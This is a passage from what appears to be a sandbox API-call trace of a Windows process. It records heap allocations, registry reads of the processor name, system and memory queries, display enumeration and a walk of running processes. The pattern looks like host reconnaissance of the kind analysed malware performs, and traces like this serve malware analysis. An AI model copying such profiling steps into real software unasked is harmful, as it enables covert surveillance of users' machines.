(HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970358 [0109.923] GetLastError () returned 0x0 [0109.923] SetLastError (dwErrCode=0x0) [0109.923] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970358 | out: hHeap=0x29a0000) returned 1 [0109.923] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a14a8 | out: hHeap=0x29a0000) returned 1 [0109.923] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970048 | out: hHeap=0x29a0000) returned 1 [0109.923] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a10d0 | out: hHeap=0x29a0000) returned 1 [0109.923] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a10d0 [0109.923] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970048 [0109.923] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a14a8 [0109.924] GetLastError () returned 0x0 [0109.924] SetLastError (dwErrCode=0x0) [0109.924] GetLastError () returned 0x0 [0109.924] SetLastError (dwErrCode=0x0) [0109.924] GetLastError () returned 0x0 [0109.924] SetLastError (dwErrCode=0x0) [0109.924] GetLastError () returned 0x0 [0109.924] SetLastError (dwErrCode=0x0) [0109.924] GetLastError () returned 0x0 [0109.924] SetLastError (dwErrCode=0x0) [0109.924] GetLastError () returned 0x0 [0109.924] SetLastError (dwErrCode=0x0) [0109.924] GetLastError () returned 0x0 [0109.924] SetLastError (dwErrCode=0x0) [0109.924] GetLastError () returned 0x0 [0109.924] SetLastError (dwErrCode=0x0) [0109.924] GetLastError () returned 0x0 [0109.924] SetLastError (dwErrCode=0x0) [0109.924] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970538 [0109.924] GetLastError () returned 0x0 [0109.924] SetLastError (dwErrCode=0x0) [0109.925] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970538 | out: hHeap=0x29a0000) returned 1 [0109.925] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a14a8 | out: hHeap=0x29a0000) returned 1 [0109.925] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970048 | out: hHeap=0x29a0000) returned 1 [0109.925] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a10d0 | out: hHeap=0x29a0000) returned 1 [0109.925] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970380 [0109.925] GetLastError () returned 0x0 [0109.925] SetLastError (dwErrCode=0x0) [0109.925] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970380 | out: hHeap=0x29a0000) returned 1 [0109.925] GetSystemTime (in: lpSystemTime=0x19f5e4 | out: lpSystemTime=0x19f5e4*(wYear=0x7e5, wMonth=0x9, wDayOfWeek=0x1, wDay=0x1b, wHour=0x10, wMinute=0x20, wSecond=0x5, wMilliseconds=0x3ac)) [0109.925] GetTimeZoneInformation (in: lpTimeZoneInformation=0x19f620 | out: lpTimeZoneInformation=0x19f620) returned 0x2 [0109.925] TzSpecificLocalTimeToSystemTime (in: lpTimeZoneInformation=0x19f620, lpLocalTime=0x19f5e4, lpUniversalTime=0x19f5f4 | out: lpUniversalTime=0x19f5f4) returned 1 [0109.925] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a10d0 [0109.926] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970048 [0109.926] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a14a8 [0109.926] GetLastError () returned 0x0 [0109.926] SetLastError (dwErrCode=0x0) [0110.018] GetLastError () returned 0x0 [0110.019] SetLastError (dwErrCode=0x0) [0110.019] GetLastError () returned 0x0 [0110.019] SetLastError (dwErrCode=0x0) [0110.019] GetLastError () returned 0x0 [0110.019] SetLastError (dwErrCode=0x0) [0110.019] GetLastError () returned 0x0 [0110.019] SetLastError (dwErrCode=0x0) [0110.019] GetLastError () returned 0x0 [0110.019] SetLastError (dwErrCode=0x0) [0110.019] GetLastError () returned 0x0 [0110.019] SetLastError (dwErrCode=0x0) [0110.019] GetLastError () returned 0x0 [0110.019] SetLastError (dwErrCode=0x0) [0110.019] GetLastError () returned 0x0 [0110.019] SetLastError (dwErrCode=0x0) [0110.019] GetLastError () returned 0x0 [0110.019] SetLastError (dwErrCode=0x0) [0110.019] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39703f8 [0110.019] GetLastError () returned 0x0 [0110.020] SetLastError (dwErrCode=0x0) [0110.020] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39703f8 | out: hHeap=0x29a0000) returned 1 [0110.020] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a14a8 | out: hHeap=0x29a0000) returned 1 [0110.020] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970048 | out: hHeap=0x29a0000) returned 1 [0110.020] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a10d0 | out: hHeap=0x29a0000) returned 1 [0110.020] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970420 [0110.020] GetLastError () returned 0x0 [0110.020] SetLastError (dwErrCode=0x0) [0110.020] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970420 | out: hHeap=0x29a0000) returned 1 [0110.020] GetLastError () returned 0x0 [0110.020] SetLastError (dwErrCode=0x0) [0110.020] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", ulOptions=0x0, samDesired=0x20119, phkResult=0x19f4d4 | out: phkResult=0x19f4d4*=0x35c) returned 0x0 [0110.020] RegQueryValueExA (in: hKey=0x35c, lpValueName="ProcessorNameString", lpReserved=0x0, lpType=0x0, lpData=0x19f4d8, lpcbData=0x19f4d0*=0xff | out: lpType=0x0, lpData=0x19f4d8*=0x49, lpcbData=0x19f4d0*=0x28) returned 0x0 [0110.020] RegCloseKey (hKey=0x35c) returned 0x0 [0110.021] CharToOemA (in: pSrc="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz", pDst=0x19f5d8 | out: pDst="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned 1 [0110.021] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x3970048 [0110.021] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x47) returned 0x3970080 [0110.021] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970048 | out: hHeap=0x29a0000) returned 1 [0110.021] GetLastError () returned 0x0 [0110.021] SetLastError (dwErrCode=0x0) [0110.021] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970080 | out: hHeap=0x29a0000) returned 1 [0110.021] GetSystemInfo (in: lpSystemInfo=0x19f6b8 | out: lpSystemInfo=0x19f6b8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0110.021] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a10d0 [0110.021] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970048 [0110.021] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a14a8 [0110.022] GetLastError () returned 0x0 [0110.022] SetLastError (dwErrCode=0x0) [0110.022] GetLastError () returned 0x0 [0110.022] SetLastError (dwErrCode=0x0) [0110.022] GetLastError () returned 0x0 [0110.022] SetLastError (dwErrCode=0x0) [0110.022] GetLastError () returned 0x0 [0110.022] SetLastError (dwErrCode=0x0) [0110.022] GetLastError () returned 0x0 [0110.022] SetLastError (dwErrCode=0x0) [0110.022] GetLastError () returned 0x0 [0110.022] SetLastError (dwErrCode=0x0) [0110.022] GetLastError () returned 0x0 [0110.022] SetLastError (dwErrCode=0x0) [0110.022] GetLastError () returned 0x0 [0110.022] SetLastError (dwErrCode=0x0) [0110.022] GetLastError () returned 0x0 [0110.022] SetLastError (dwErrCode=0x0) [0110.022] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39706c8 [0110.022] GetLastError () returned 0x0 [0110.022] SetLastError (dwErrCode=0x0) [0110.022] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39706c8 | out: hHeap=0x29a0000) returned 1 [0110.023] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a14a8 | out: hHeap=0x29a0000) returned 1 [0110.023] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970048 | out: hHeap=0x29a0000) returned 1 [0110.023] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a10d0 | out: hHeap=0x29a0000) returned 1 [0110.023] GetLastError () returned 0x0 [0110.023] SetLastError (dwErrCode=0x0) [0110.023] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x74650000 [0110.023] GetProcAddress (hModule=0x74650000, lpProcName="GlobalMemoryStatusEx") returned 0x7466afe0 [0110.023] GlobalMemoryStatusEx (in: lpBuffer=0x19f654 | out: lpBuffer=0x19f654) returned 1 [0110.023] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a10d0 [0110.024] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970048 [0110.024] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a14a8 [0110.024] GetLastError () returned 0x0 [0110.024] SetLastError (dwErrCode=0x0) [0110.024] GetLastError () returned 0x0 [0110.024] SetLastError (dwErrCode=0x0) [0110.024] GetLastError () returned 0x0 [0110.024] SetLastError (dwErrCode=0x0) [0110.024] GetLastError () returned 0x0 [0110.024] SetLastError (dwErrCode=0x0) [0110.024] GetLastError () returned 0x0 [0110.024] SetLastError (dwErrCode=0x0) [0110.024] GetLastError () returned 0x0 [0110.024] SetLastError (dwErrCode=0x0) [0110.024] GetLastError () returned 0x0 [0110.025] SetLastError (dwErrCode=0x0) [0110.025] GetLastError () returned 0x0 [0110.025] SetLastError (dwErrCode=0x0) [0110.025] GetLastError () returned 0x0 [0110.025] SetLastError (dwErrCode=0x0) [0110.025] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39703f8 [0110.025] GetLastError () returned 0x0 [0110.025] SetLastError (dwErrCode=0x0) [0110.025] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39703f8 | out: hHeap=0x29a0000) returned 1 [0110.025] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a14a8 | out: hHeap=0x29a0000) returned 1 [0110.025] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970048 | out: hHeap=0x29a0000) returned 1 [0110.025] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a10d0 | out: hHeap=0x29a0000) returned 1 [0110.025] GetLastError () returned 0x0 [0110.025] SetLastError (dwErrCode=0x0) [0110.025] EnumDisplayDevicesA (in: lpDevice=0x0, iDevNum=0x0, lpDisplayDevice=0x19f530, dwFlags=0x1 | out: lpDisplayDevice=0x19f530) returned 1 [0110.027] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39703d0 [0110.027] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x3970048 [0110.027] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39703d0 | out: hHeap=0x29a0000) returned 1 [0110.027] GetLastError () returned 0x0 [0110.027] SetLastError (dwErrCode=0x0) [0110.027] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970048 | out: hHeap=0x29a0000) returned 1 [0110.027] GetLastError () returned 0x0 [0110.027] SetLastError (dwErrCode=0x0) [0110.027] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a10d0 [0110.027] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970048 [0110.027] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a14a8 [0110.027] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x35c [0110.042] Process32First (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0110.043] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0110.044] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x3970068 [0110.044] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970078 [0110.044] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x3970098 [0110.044] GetLastError () returned 0x0 [0110.044] SetLastError (dwErrCode=0x0) [0110.045] GetLastError () returned 0x0 [0110.045] SetLastError (dwErrCode=0x0) [0110.045] GetLastError () returned 0x0 [0110.045] SetLastError (dwErrCode=0x0) [0110.045] GetLastError () returned 0x0 [0110.045] SetLastError (dwErrCode=0x0) [0110.045] GetLastError () returned 0x0 [0110.045] SetLastError (dwErrCode=0x0) [0110.045] GetLastError () returned 0x0 [0110.045] SetLastError (dwErrCode=0x0) [0110.045] GetLastError () returned 0x0 [0110.045] SetLastError (dwErrCode=0x0) [0110.045] GetLastError () returned 0x0 [0110.045] SetLastError (dwErrCode=0x0) [0110.045] GetLastError () returned 0x0 [0110.045] SetLastError (dwErrCode=0x0) [0110.045] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39705b0 [0110.045] GetLastError () returned 0x0 [0110.045] SetLastError (dwErrCode=0x0) [0110.045] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39705b0 | out: hHeap=0x29a0000) returned 1 [0110.046] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970098 | out: hHeap=0x29a0000) returned 1 [0110.046] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970078 | out: hHeap=0x29a0000) returned 1 [0110.046] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970068 | out: hHeap=0x29a0000) returned 1 [0110.046] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970628 [0110.046] GetLastError () returned 0x0 [0110.046] SetLastError (dwErrCode=0x0) [0110.046] GetLastError () returned 0x0 [0110.046] SetLastError (dwErrCode=0x0) [0110.046] GetLastError () returned 0x0 [0110.046] SetLastError (dwErrCode=0x0) [0110.046] GetLastError () returned 0x0 [0110.046] SetLastError (dwErrCode=0x0) [0110.050] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0110.190] GetLastError () returned 0x0 [0110.190] SetLastError (dwErrCode=0x0) [0110.190] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x3970068 [0110.190] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970628 | out: hHeap=0x29a0000) returned 1 [0110.190] GetLastError () returned 0x0 [0110.190] SetLastError (dwErrCode=0x0) [0110.190] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x39700b0 [0110.190] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970dc0 [0110.190] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x39700c0 [0110.191] GetLastError () returned 0x0 [0110.191] SetLastError (dwErrCode=0x0) [0110.191] GetLastError () returned 0x0 [0110.191] SetLastError (dwErrCode=0x0) [0110.191] GetLastError () returned 0x0 [0110.191] SetLastError (dwErrCode=0x0) [0110.191] GetLastError () returned 0x0 [0110.191] SetLastError (dwErrCode=0x0) [0110.191] GetLastError () returned 0x0 [0110.191] SetLastError (dwErrCode=0x0) [0110.191] GetLastError () returned 0x0 [0110.191] SetLastError (dwErrCode=0x0) [0110.191] GetLastError () returned 0x0 [0110.191] SetLastError (dwErrCode=0x0) [0110.191] GetLastError () returned 0x0 [0110.191] SetLastError (dwErrCode=0x0) [0110.191] GetLastError () returned 0x0 [0110.191] SetLastError (dwErrCode=0x0) [0110.192] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970358 [0110.192] GetLastError () returned 0x0 [0110.192] SetLastError (dwErrCode=0x0) [0110.192] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970358 | out: hHeap=0x29a0000) returned 1 [0110.192] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700c0 | out: hHeap=0x29a0000) returned 1 [0110.192] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970dc0 | out: hHeap=0x29a0000) returned 1 [0110.192] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700b0 | out: hHeap=0x29a0000) returned 1 [0110.192] GetLastError () returned 0x0 [0110.192] SetLastError (dwErrCode=0x0) [0110.192] GetLastError () returned 0x0 [0110.192] SetLastError (dwErrCode=0x0) [0110.192] GetLastError () returned 0x0 [0110.192] SetLastError (dwErrCode=0x0) [0110.192] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x60) returned 0x39700b0 [0110.192] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970068 | out: hHeap=0x29a0000) returned 1 [0110.192] GetLastError () returned 0x0 [0110.192] SetLastError (dwErrCode=0x0) [0110.192] GetLastError () returned 0x0 [0110.193] SetLastError (dwErrCode=0x0) [0110.193] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0110.194] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x3970118 [0110.194] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970ee0 [0110.194] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x3970068 [0110.194] GetLastError () returned 0x0 [0110.194] SetLastError (dwErrCode=0x0) [0110.194] GetLastError () returned 0x0 [0110.194] SetLastError (dwErrCode=0x0) [0110.194] GetLastError () returned 0x0 [0110.194] SetLastError (dwErrCode=0x0) [0110.194] GetLastError () returned 0x0 [0110.194] SetLastError (dwErrCode=0x0) [0110.194] GetLastError () returned 0x0 [0110.194] SetLastError (dwErrCode=0x0) [0110.194] GetLastError () returned 0x0 [0110.195] SetLastError (dwErrCode=0x0) [0110.195] GetLastError () returned 0x0 [0110.195] SetLastError (dwErrCode=0x0) [0110.195] GetLastError () returned 0x0 [0110.195] SetLastError (dwErrCode=0x0) [0110.195] GetLastError () returned 0x0 [0110.195] SetLastError (dwErrCode=0x0) [0110.195] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970510 [0110.195] GetLastError () returned 0x0 [0110.195] SetLastError (dwErrCode=0x0) [0110.195] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970510 | out: hHeap=0x29a0000) returned 1 [0110.195] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970068 | out: hHeap=0x29a0000) returned 1 [0110.195] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970ee0 | out: hHeap=0x29a0000) returned 1 [0110.195] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970118 | out: hHeap=0x29a0000) returned 1 [0110.195] GetLastError () returned 0x0 [0110.195] SetLastError (dwErrCode=0x0) [0110.195] GetLastError () returned 0x0 [0110.196] SetLastError (dwErrCode=0x0) [0110.196] GetLastError () returned 0x0 [0110.196] SetLastError (dwErrCode=0x0) [0110.196] GetLastError () returned 0x0 [0110.196] SetLastError (dwErrCode=0x0) [0110.196] GetLastError () returned 0x0 [0110.196] SetLastError (dwErrCode=0x0) [0110.196] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0110.197] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x3970118 [0110.197] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970c40 [0110.197] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x3970068 [0110.197] GetLastError () returned 0x0 [0110.198] SetLastError (dwErrCode=0x0) [0110.198] GetLastError () returned 0x0 [0110.198] SetLastError (dwErrCode=0x0) [0110.198] GetLastError () returned 0x0 [0110.198] SetLastError (dwErrCode=0x0) [0110.198] GetLastError () returned 0x0 [0110.198] SetLastError (dwErrCode=0x0) [0110.198] GetLastError () returned 0x0 [0110.198] SetLastError (dwErrCode=0x0) [0110.198] GetLastError () returned 0x0 [0110.198] SetLastError (dwErrCode=0x0) [0110.198] GetLastError () returned 0x0 [0110.198] SetLastError (dwErrCode=0x0) [0110.198] GetLastError () returned 0x0 [0110.198] SetLastError (dwErrCode=0x0) [0110.198] GetLastError () returned 0x0 [0110.198] SetLastError (dwErrCode=0x0) [0110.199] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970678 [0110.199] GetLastError () returned 0x0 [0110.199] SetLastError (dwErrCode=0x0) [0110.199] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970678 | out: hHeap=0x29a0000) returned 1 [0110.199] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970068 | out: hHeap=0x29a0000) returned 1 [0110.199] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970c40 | out: hHeap=0x29a0000) returned 1 [0110.199] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970118 | out: hHeap=0x29a0000) returned 1 [0110.199] GetLastError () returned 0x0 [0110.199] SetLastError (dwErrCode=0x0) [0110.199] GetLastError () returned 0x0 [0110.199] SetLastError (dwErrCode=0x0) [0110.199] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x90) returned 0x3970f40 [0110.199] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700b0 | out: hHeap=0x29a0000) returned 1 [0110.199] GetLastError () returned 0x0 [0110.199] SetLastError (dwErrCode=0x0) [0110.200] GetLastError () returned 0x0 [0110.200] SetLastError (dwErrCode=0x0) [0110.200] GetLastError () returned 0x0 [0110.200] SetLastError (dwErrCode=0x0) [0110.200] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0110.201] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x3970fd8 [0110.201] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970d00 [0110.201] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x3970068 [0110.201] GetLastError () returned 0x0 [0110.201] SetLastError (dwErrCode=0x0) [0110.201] GetLastError () returned 0x0 [0110.201] SetLastError (dwErrCode=0x0) [0110.201] GetLastError () returned 0x0 [0110.201] SetLastError (dwErrCode=0x0) [0110.201] GetLastError () returned 0x0 [0110.201] SetLastError (dwErrCode=0x0) [0110.201] GetLastError () returned 0x0 [0110.201] SetLastError (dwErrCode=0x0) [0110.202] GetLastError () returned 0x0 [0110.202] SetLastError (dwErrCode=0x0) [0110.202] GetLastError () returned 0x0 [0110.202] SetLastError (dwErrCode=0x0) [0110.202] GetLastError () returned 0x0 [0110.202] SetLastError (dwErrCode=0x0) [0110.202] GetLastError () returned 0x0 [0110.202] SetLastError (dwErrCode=0x0) [0110.202] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970628 [0110.202] GetLastError () returned 0x0 [0110.202] SetLastError (dwErrCode=0x0) [0110.202] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970628 | out: hHeap=0x29a0000) returned 1 [0110.202] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970068 | out: hHeap=0x29a0000) returned 1 [0110.202] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970d00 | out: hHeap=0x29a0000) returned 1 [0110.202] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970fd8 | out: hHeap=0x29a0000) returned 1 [0110.202] GetLastError () returned 0x0 [0110.202] SetLastError (dwErrCode=0x0) [0110.203] GetLastError () returned 0x0 [0110.203] SetLastError (dwErrCode=0x0) [0110.203] GetLastError () returned 0x0 [0110.203] SetLastError (dwErrCode=0x0) [0110.203] GetLastError () returned 0x0 [0110.203] SetLastError (dwErrCode=0x0) [0110.203] GetLastError () returned 0x0 [0110.203] SetLastError (dwErrCode=0x0) [0110.203] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0110.204] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x3970fd8 [0110.204] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970e40 [0110.204] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x3970068 [0110.204] GetLastError () returned 0x0 [0110.204] SetLastError (dwErrCode=0x0) [0110.204] GetLastError () returned 0x0 [0110.204] SetLastError (dwErrCode=0x0) [0110.204] GetLastError () returned 0x0 [0110.205] SetLastError (dwErrCode=0x0) [0110.205] GetLastError () returned 0x0 [0110.205] SetLastError (dwErrCode=0x0) [0110.205] GetLastError () returned 0x0 [0110.205] SetLastError (dwErrCode=0x0) [0110.205] GetLastError () returned 0x0 [0110.205] SetLastError (dwErrCode=0x0) [0110.205] GetLastError () returned 0x0 [0110.205] SetLastError (dwErrCode=0x0) [0110.205] GetLastError () returned 0x0 [0110.205] SetLastError (dwErrCode=0x0) [0110.205] GetLastError () returned 0x0 [0110.205] SetLastError (dwErrCode=0x0) [0110.205] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39706c8 [0110.205] GetLastError () returned 0x0 [0110.205] SetLastError (dwErrCode=0x0) [0110.205] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39706c8 | out: hHeap=0x29a0000) returned 1 [0110.205] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970068 | out: hHeap=0x29a0000) returned 1 [0110.205] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970e40 | out: hHeap=0x29a0000) returned 1 [0110.206] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970fd8 | out: hHeap=0x29a0000) returned 1 [0110.206] GetLastError () returned 0x0 [0110.206] SetLastError (dwErrCode=0x0) [0110.206] GetLastError () returned 0x0 [0110.206] SetLastError (dwErrCode=0x0) [0110.206] GetLastError () returned 0x0 [0110.206] SetLastError (dwErrCode=0x0) [0110.206] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xd8) returned 0x29a04a0 [0110.206] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970f40 